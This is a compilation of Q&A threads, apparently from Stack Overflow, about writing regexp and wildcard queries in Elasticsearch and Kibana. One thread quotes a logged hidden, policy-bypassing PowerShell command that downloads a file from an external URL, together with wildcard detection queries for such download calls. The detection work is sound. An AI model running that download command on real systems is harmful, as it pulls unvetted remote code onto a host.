Using regular expressions in elasticsearch term queries - regex

I want to find all items whose ID matches a regular expression such as
*TEST123* //pattern for regexp
So the expected results are items like
ATEST123001
ATEST123002
ATEST123003
TTTTEST123001
...
I could write a script that scans the whole index and saves the IDs to a log file that I can check later, but I would like to find a better solution.
Updated
I tried
"query" : { "match_all" : { }, "filtered" : { "filter" : { "regexp": { "id":".test123." } } } }, }
I receive
//nested: ElasticsearchParseException[Expected field name but got START_OBJECT \"filtered\"]
When I tried
{
"regexp": {
"id": "test123"
}
}
//Parse Failure [No parser for element [regexp]]]
ES 1.7.4 and Lucene 4.10.4

You can use the regexp query, which matches indexed terms against a regular expression.
Ref:
https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-regexp-query.html
Sample regex query:
{
"regexp":{
"id": ".*test123.*"
}
}
Update:
In 2.0 the regexp filter was replaced by the regexp query. On 1.x, wrap the regexp filter in a filtered query:
{
"query": {
"filtered": {
"filter": {
"regexp":{
"id":".*TEST123.*"
}
}
}
}
}
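To see why the bare pattern test123 finds nothing while .*TEST123.* works: Lucene regular expressions are implicitly anchored, so the pattern has to cover the whole indexed term. Here is a minimal Python sketch of that behaviour, using re.fullmatch as a stand-in for Lucene's matching. Python's regex syntax is not identical to Lucene's, the helper name matching_ids is made up for illustration, and OTHER999 is an invented non-matching ID.

```python
import re

# Sample IDs from the question, plus one invented ID that should not match.
IDS = ["ATEST123001", "ATEST123002", "ATEST123003", "TTTTEST123001", "OTHER999"]


def matching_ids(pattern, ids):
    """Return the ids that the pattern matches in full (hypothetical helper).

    re.fullmatch approximates Lucene's implicit anchoring: the pattern
    must cover the entire term, not just a substring of it.
    """
    compiled = re.compile(pattern)
    return [value for value in ids if compiled.fullmatch(value)]


if __name__ == "__main__":
    # Substring-style pattern: no term is matched in full.
    print(matching_ids("TEST123", IDS))
    # Wildcards on both sides: every ID containing TEST123 is matched.
    print(matching_ids(".*TEST123.*", IDS))
```

If the id field is analyzed (the default for string fields in 1.x), the indexed terms are usually lowercased, in which case the pattern would have to be lowercase as well.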

You can try a query_string query.
{
"query": {
"query_string": {
"default_field": "id",
"query": "*test123*"
}
}
}

Related

Kibana Query Language - find numbers in a field

I am struggling with a simple query that is supposed to work according to many tutorials, but I cannot make it work. I have a log field containing
Request sent, method=GET, headers={}, queryParams={forceArray=[true]}, entity=null, payload length=null} playerId=102
I am trying to match a playerId with a 3-digit value. The following query
log: /playerId=[0-9]{1,3}/
fails with KQLSyntaxError: Expected AND, OR, end of input, whitespace but "{" found.
It is supposed to work according to https://dzone.com/articles/getting-started-with-kibana-advanced-searches
The query log: /playerId=[0-9][0-9][0-9]/ returns basically everything containing a single '0' character.
The query log: /playerId=*/ returns nothing, for some mysterious reason.
Edit
A regular Elasticsearch (Lucene-based) regexp query does not work either:
{
"query": {
"regexp": {
"log": {
"value": "*playerId*"
}
}
}
}
mapping:
{
"my-index" : {
"mappings" : {
"log" : {
"full_name" : "log",
"mapping" : {
"log" : {
"type" : "text",
"fields" : {
"keyword" : {
"type" : "keyword",
"ignore_above" : 256
}
}
}
}
}
}
}
}
any help appreciated
Edit
I validated my regex queries on https://regex101.com/ and they all work.
Edit 2
This works:
"query": {
"match": {
"log": "playerId"
}
}
This returns empty hits:
"query": {
"regexp": {
"log": "playerId"
}
}
regards
This is because Kibana uses KQL (Kibana Query Language) by default, and KQL does not support regular expressions.
You need to switch to the Lucene query language (the query string syntax), which supports the regular expression you are trying to use.
Just click on KQL at the right end of the search bar to change the search syntax.
It is also worth noting that regular expression queries are real performance hogs. You should really parse your logs before ingesting them so that you can query the playerId field independently.
In any case, if you really want to do it that way, your query is not far off. Here is a version that should work for your case:
{
"query": {
"query_string": {
"query": "/.*playerId=[0-9]{3}/",
"default_field": "log.keyword"
}
}
}
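As for why the regexp on the plain log field came back empty while match worked: a regexp pattern is not analyzed, whereas the text field stores analyzed (tokenized, lowercased) terms, and log.keyword stores the whole line as a single term. Below is a rough Python sketch of that difference. The tokenizer is only a crude approximation of the standard analyzer, and the helper names rough_terms and any_term_matches are made up for illustration.

```python
import re

# The log line from the question.
LOG_LINE = (
    "Request sent, method=GET, headers={}, queryParams={forceArray=[true]}, "
    "entity=null, payload length=null} playerId=102"
)


def rough_terms(text):
    """Crude stand-in for the standard analyzer (assumption, not the real
    UAX #29 rules): split on non-alphanumerics and lowercase each token."""
    return [token.lower() for token in re.findall(r"[A-Za-z0-9]+", text)]


def any_term_matches(pattern, terms):
    """True if the pattern matches at least one term in full."""
    return any(re.fullmatch(pattern, term) for term in terms)


if __name__ == "__main__":
    text_terms = rough_terms(LOG_LINE)  # roughly what the `log` text field holds
    keyword_terms = [LOG_LINE]          # `log.keyword` holds one untouched term

    # Case mismatch: the indexed term is "playerid", the pattern is "playerId".
    print(any_term_matches("playerId", text_terms))
    # Lowercase pattern matches the lowercased term.
    print(any_term_matches("playerid", text_terms))
    # On the keyword subfield the pattern must cover the whole line.
    print(any_term_matches(".*playerId=[0-9]{3}", keyword_terms))
```

Keep in mind that with "ignore_above": 256 in the mapping, log lines longer than 256 characters are not indexed in log.keyword at all, so they cannot be found this way.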

AWS ElasticSearch Query for Keyword not getting results I expect

I have an ElasticSearch query that looks like:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message.keyword": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}
And a Doc in my Index that includes:
message:Engine state is changed from None to Available. Details: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.18362.628 HostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67 HostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download EngineVersion=5.1.18362.628 RunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72
As you can see above it includes:
(New-Object System.Net.WebClient).DownloadFile('https:....
It seems like the filter here should be matching the message, but when I execute the Query through Kibana, nothing matches even though I can see the doc above inside my index through Kibana UI if I just query for *.
I think maybe this is because the query above is querying for Message.keyword? How do I get it to successfully hit the document above?
Edit:
mapping: https://pastebin.com/cWN4jF3d
Sample data: https://pastebin.com/SyErqaG8
There are two reasons why the query returns no results:
1. The field name in the mapping is message, whereas your query uses Message.
2. A field with the keyword datatype indexes the data as is, which means matching is case sensitive. The document you shared contains the text System.Net.WebClient).DownloadFile( with uppercase characters, whereas the pattern you expect to match, "*system.net.webclient).downloadfile(*", is all lowercase.
Therefore the query should be:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadFile(*"
}
}
]
}
}
}
}
}
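The case-sensitivity point can be checked locally with a small Python sketch. It uses fnmatch.fnmatchcase as a stand-in for a wildcard query against a keyword field. This is only an approximation (fnmatch also treats [ ] specially, which the patterns here do not use), and keyword_wildcard_match is a made-up helper name.

```python
from fnmatch import fnmatchcase

# Excerpt of the message value from the question's document.
MESSAGE = (
    "HostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass "
    "-noprofile -windowstyle hidden -command "
    "(New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download"
)


def keyword_wildcard_match(pattern, value):
    """Case-sensitive wildcard match of the pattern against the whole value
    (hypothetical helper approximating a wildcard query on a keyword field)."""
    return fnmatchcase(value, pattern)


if __name__ == "__main__":
    # Same case as the stored value: matches.
    print(keyword_wildcard_match("*System.Net.WebClient).DownloadFile(*", MESSAGE))
    # All-lowercase pattern: no match, because the keyword value keeps its case.
    print(keyword_wildcard_match("*system.net.webclient).downloadfile(*", MESSAGE))
```

Newer Elasticsearch versions (7.10 and later, as far as I know) also accept a case_insensitive option on wildcard queries; whether your AWS domain supports it depends on its version.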
The keyword fields are used only for exact match. You will need to match the regular fields if you only want to match a substring / subset of the string, by querying on Message instead of Message.keyword:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}

Elasticsearch escape "¬" character in regex

I am stuck on the "¬" symbol when running an Elasticsearch regexp query
that should return records in the format "prefix-content¬value".
Example (not limited to the website pattern; it can be any value): "website-website descriptions that not required¬www.google.com".
{
"query": {
"filtered": {
"query": {
"match_all": {}
},
"filter": {
"regexp": {
"information": "(website?)(.*¬)(www.google.com?)"
}
}
}
}
}
Has anyone encountered this problem before and managed to handle it? Thanks.

Query Elasticsearch by id using the regex or wildcard filter

I got a list of IDs:
bc2***********************13
b53***********************92
39f***********************bb
eb7***********************7a
80b***********************22
Each * is an unknown character, and I need to find all IDs matching these patterns.
I tried the regexp filter on field names like id, _id and ID, always with "bc2.*13" (or others), but always got no matches, even for existing documents.
By default, the _id field is not indexed, which is why you get no results.
Try setting the _id field as analyzed in the mapping:
POST /test_id/
{
"mappings":{
"indexed":{
"_id":{
"index":"analyzed"
}
}
}
}
Adding some docs:
PUT /test_id/indexed/bc2***********************13
{
"content":"test1"
}
PUT /test_id/indexed/b53***********************92
{
"content":"test2"
}
I checked with one of your simple regexp queries:
POST /test_id/_search
{
"query": {
"regexp": {
"_id": "bc2.*13"
}
}
}
Result:
"hits": {
"total": 1,
"max_score": 1,
"hits": [
{
"_index": "test_id",
"_type": "indexed",
"_id": "bc2***********************13",
"_score": 1,
"_source": {
"content": "test1"
}
}
]
}
Hope this helps :)
If the *'s are of a known and constant length:
bc2.{23}13|b53.{23}92|39f.{23}bb|eb7.{23}7a|80b.{23}22
Else:
bc2.*?13|b53.*?92|39f.*?bb|eb7.*?7a|80b.*?22
Use the _uid field and the wildcard query:
GET yourIndex/yourType/_search
{
"query": {
"wildcard": {
"_uid": "bc2***********************13"
}
}
}
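A note on the masks: in a wildcard query, * matches any number of characters, while ? matches exactly one. If each * in the list stands for exactly one unknown character, the masks can be converted into fixed-length regexes like the ones in the answer above. Here is a small Python sketch of that conversion; mask_to_regex and combined_regex are made-up helper names, and the escaping is Python-style, which is only safe to reuse in Lucene for plain alphanumeric IDs.

```python
import re


def mask_to_regex(mask):
    """Turn a masked ID such as 'bc2***13' into the regex 'bc2.{3}13'.

    Each run of n asterisks becomes '.{n}'; all other characters are
    kept as literals.
    """
    parts = re.split(r"(\*+)", mask)
    out = []
    for part in parts:
        if part.startswith("*"):
            out.append(".{%d}" % len(part))
        else:
            out.append(re.escape(part))
    return "".join(out)


def combined_regex(masks):
    """Join several masks into a single alternation."""
    return "|".join(mask_to_regex(mask) for mask in masks)


if __name__ == "__main__":
    masks = ["bc2" + "*" * 23 + "13", "b53" + "*" * 23 + "92"]
    print(combined_regex(masks))
```

The resulting string can then be used as the value of a regexp query on whichever ID field is actually indexed in your setup.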

ElasticSearch and Regex queries

I am trying to query for documents that have dates within the body of the "content" field.
curl -XGET 'http://localhost:9200/index/_search' -d '{
"query": {
"regexp": {
"content": "^(0[1-9]|[12][0-9]|3[01])[- /.](0[1-9]|1[012])[- /.]((19|20)\\d\\d)$"
}
}
}'
Getting closer maybe?
curl -XGET 'http://localhost:9200/index/_search' -d '{
"filtered": {
"query": {
"match_all": {}
},
"filter": {
"regexp":{
"content" : "^(0[1-9]|[12][0-9]|3[01])[- /.](0[1-9]|1[012])[- /.]((19|20)\\d\\d)$"
}
}
}
}'
My regex seems to have been off. This regex has been validated on regex101.com. The following query still returns nothing from the 175k documents I have.
curl -XPOST 'http://localhost:9200/index/_search?pretty=true' -d '{
"query": {
"regexp":{
"content" : "/[0-9]{4}-[0-9]{2}-[0-9]{2}|[0-9]{2}-[0-9]{2}-[0-9]{4}|[0-9]{2}/[0-9]{2}/[0-9]{4}|[0-9]{4}/[0-9]{2}/[0-9]{2}/g"
}
}
}'
I am starting to think that my index might not be set up for such a query. What type of field do you have to use to be able to use regular expressions?
mappings: {
doc: {
properties: {
content: {
type: string
}
title: {
type: string
}
host: {
type: string
}
cache: {
type: string
}
segment: {
type: string
}
query: {
properties: {
match_all: {
type: object
}
}
}
digest: {
type: string
}
boost: {
type: string
}
tstamp: {
format: dateOptionalTime
type: date
}
url: {
type: string
}
fields: {
type: string
}
anchor: {
type: string
}
}
}
}
I want to find any record that has a date and graph the volume of documents by that date. Step 1 is to get this query working. Step 2 will be to pull the dates out and group the documents accordingly. Can someone suggest a way to get the first part working? I know the second part will be really tricky.
Thanks!
You should read Elasticsearch's Regexp Query documentation carefully; you are making some incorrect assumptions about how the regexp query works.
Probably the most important thing to understand here is what the string you are trying to match is. You are trying to match terms, not the entire string. If this is being indexed with StandardAnalyzer, as I would suspect, your dates will be separated into multiple terms:
"01/01/1901" becomes tokens "01", "01" and "1901"
"01 01 1901" becomes tokens "01", "01" and "1901"
"01-01-1901" becomes tokens "01", "01" and "1901"
"01.01.1901" actually will be a single token: "01.01.1901" (Due to decimal handling, see UAX #29)
You can only match a single, whole token with a regexp query.
Elasticsearch (and Lucene) do not support full Perl-compatible regex syntax.
In your first couple of examples, you are using anchors, ^ and $. These are not supported. Your regex must match the entire token to get a match anyway, so anchors are not needed.
Shorthand character classes like \d (or \\d) are also not supported. Instead of \\d\\d, use [0-9]{2}.
In your last attempt, you are using /{regex}/g, which is also not supported. Since your regex needs to match the whole string, the global flag wouldn't even make sense in context. Unless you are using a query parser which uses them to denote a regex, your regex should not be wrapped in slashes.
(By the way: How did this one validate on regex101? You have a bunch of unescaped /s. It complains at me when I try it.)
To support this sort of query on such an analyzed field, you'll probably want to look to span queries, and particularly Span Multiterm and Span Near. Perhaps something like:
{
"span_near" : {
"clauses" : [
{ "span_multi" : {
"match": {
"regexp": {"content": "0[1-9]|[12][0-9]|3[01]"}
}
}},
{ "span_multi" : {
"match": {
"regexp": {"content": "0[1-9]|1[012]"}
}
}},
{ "span_multi" : {
"match": {
"regexp": {"content": "(19|20)[0-9]{2}"}
}
}}
],
"slop" : 0,
"in_order" : true
}
}
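If you need to generate this kind of query for several date layouts, the nesting is easy to get wrong by hand. Here is a minimal Python sketch that builds the same span_near structure from a list of per-token patterns; date_span_query is a made-up helper name, and the sketch only assembles the request body, it does not talk to a cluster.

```python
import json


def date_span_query(field, token_patterns, slop=0):
    """Build a span_near query with one span_multi/regexp clause per token.

    Each pattern must match one whole token of the analyzed field.
    """
    clauses = [
        {"span_multi": {"match": {"regexp": {field: pattern}}}}
        for pattern in token_patterns
    ]
    return {"span_near": {"clauses": clauses, "slop": slop, "in_order": True}}


if __name__ == "__main__":
    # Day, month and year as three consecutive tokens (dd mm yyyy).
    query = date_span_query(
        "content",
        ["0[1-9]|[12][0-9]|3[01]", "0[1-9]|1[012]", "(19|20)[0-9]{2}"],
    )
    print(json.dumps({"query": query}, indent=2))
```

Reordering the pattern list would give the yyyy mm dd variant, still under the assumption that the analyzer splits the date into three separate tokens.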
For newer Elasticsearch versions (tested on 8.5), we can query the .keyword subfield instead.
The regexp is then matched against the whole field value rather than against individual tokens.
{
"size": 10,
"_source": [
"load",
"unload"
],
"query": {
"bool": {
"should": [
{
"regexp": {
"load.keyword": {
"value": ".*Search Term.*",
"flags": "ALL"
}
}
}
]
}
}
}